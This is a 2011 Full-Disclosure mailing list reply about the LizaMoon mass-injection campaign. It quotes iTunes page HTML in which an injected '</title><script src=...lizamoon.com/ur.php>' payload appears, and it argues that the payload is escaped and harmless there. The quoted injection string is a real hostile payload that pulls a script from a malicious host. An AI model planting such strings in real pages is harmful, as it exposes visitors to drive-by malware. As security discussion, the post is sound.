Re: [Full-disclosure] itunes.apple.com owned by webapp malicious host

[Andrew Farmer <andfarm@xxxxxxxxx>]

On 2011-03-29, at 07:22, matador matador wrote:
> Enjoy! :)
> 
> http://www.google.com/search?q=lizamoon.com+site%3Aapple.com

At least on the page I'm looking at, all of the instances where that string 
appears seem to be escaped properly - e.g,

<tr parental-rating="1" rating-podcast="1" rating-riaa="0" role="row" 
metrics-loc="Track_" 
audio-preview-url="http://www.watfbc.org/files/030911W.mp3"; 
preview-album="Women's Ministries" preview-artist="Suzanne Chambers" 
class="podcast-episode" preview-title="Sermon on the Mount 
Wk8&lt;/title&gt;&lt;script src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;"; 
adam-id="92027240" row-number="0">

<span><span class="badges"><a 
href="http://itunes.apple.com/WebObjects/MZStore.woa/wa/parentalAdvisory";><span 
class="clean">Clean</span></a></span><span class="text">Sermon on the Mount 
Wk8&lt;/title&gt;&lt;script 
src=http://lizamoon.com/ur.php&gt;&lt;/script&gt;</span></span>

<div adam-id="92027240" 
class="track-inline-details-desc-popup-data-wrapper"><script 
type="text/javascript" "charset"="utf-8">var 
__desc_popup_d_92027240={"title":"Sermon on the Mount Wk8<\/title><script 
src=http://lizamoon.com/ur.php><\/script>", 
"desc_popup_additional_css_classes":"audio", "description":"", 
"release_date":"10 March 2011", 
"desc_popup_type":"podcast_episode_description_popup", 
"release_date_label":"Released"};</script></div>

None of them trigger a resource load in Chrome.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/